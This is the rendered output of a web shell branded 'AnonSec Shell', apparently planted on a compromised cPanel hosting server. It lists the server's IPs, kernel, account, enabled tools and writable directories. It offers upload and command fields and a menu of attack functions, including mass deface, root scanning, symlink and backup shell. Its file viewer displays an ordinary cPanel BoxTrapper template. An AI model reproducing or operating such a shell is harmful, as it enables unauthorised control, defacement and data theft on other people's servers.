AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 104.23.243.33   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/2388322/root/proc/2388321/cwd/webmail/jupiter/mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/2388322/root/proc/2388321/cwd/webmail/jupiter/mail/editmsgs.html.tt
[%
    SET CPANEL.CPVAR.dprefix = "../";
    IF (ExpVar.expand('$appname') == "webmail") && !FORM.item('account');
        SET FORM.item('account') = CPANEL.authuser;
    END;

    SET message_list = execute('BoxTrapper', 'list_email_templates');
%]
[% WRAPPER '_assets/master.html.tt'
    app_key = 'boxtrapper'
%]

    <div class="body-content">
        [% IF (ExpVar.expand('$appname') == "webmail" && !( FORM.item('account') == CPANEL.authuser)) %]
        <div id="boxtrapperErrorMsg" class="alert alert-danger">
            <span class="glyphicon glyphicon-exclamation-sign"></span>
            <div class="alert-message">
                [% locale.maketext("You are not allowed to change settings for the user “[output,class,_1,status]”.",FORM.item('account')) %]
            </div>
        </div>
        [% ELSIF !message_list.status %]
            [% FOREACH error IN message_list.errors %]
                <div class="alert alert-danger" role="alert">
                    <span class='glyphicon glyphicon-remove-sign' aria-hidden="true"></span>
                    <div class='alert-message'>
                        <strong class="alert-title">
                            [% locale.maketext('Error:') %]
                        </strong>
                        <span class="alert-body">
                        <span id="error-[% loop.index() %]">
                            [% error.html() %]
                        </span>
                    </span>
                    </div>
                </div>
            [% END %]
        [% ELSE %]
        <div class="section">
            <h2 id="boxtrapperMessageFor">[% locale.maketext("[asis,BoxTrapper] message for “[output,class,_1,status]”.", FORM.item('account')) %]</h2>
            [% IF CPANEL.CPDATA.item('DEMO') %]
                [% locale.maketext("This feature is disabled in demo mode.") %]
            [% ELSE %]
                <table id="tblListMessages" class="table table-striped">
                    [% FOREACH message_type IN message_list.data %]
                        [%
                            SET account = FORM.item('account').html();
                            SET form = message_type.html();
                        %]
                        <tr>
                            <td>[% message_type.html() %]</td>
                            <td>
                                <form action="editmsg.html" method="post">
                                    <input type="hidden" name="account" value="[% account %]">
                                    <input type="hidden" name="form" value="[% form %]">
                                    <input id="boxtrapper-edit-[% form %]" type="submit" class="input-button" value="[% locale.maketext("Edit") %]">
                                </form>
                            </td>
                            <td>
                                <form action="resetmsg.html" method="post">
                                    <input type="hidden" name="account" value="[% account %]">
                                    <input type="hidden" name="form" value="[% form %]">
                                    <input id="boxtrapper-reset-[% form %]"type="submit" class="input-button" value="[% locale.maketext("Reset to Default") %]">
                                </form>
                            </td>
                        </tr>
                    [% END %]
                </table>
            [% END %]
        </div>
        [% END %]

        [% INCLUDE _assets/return_link.html.tt return_location='manage.html' post='1' formdata=FORM return_link_text=locale.maketext("Go Back") %]
    </div>
[% END %]


Anon7 - 2022
AnonSec Team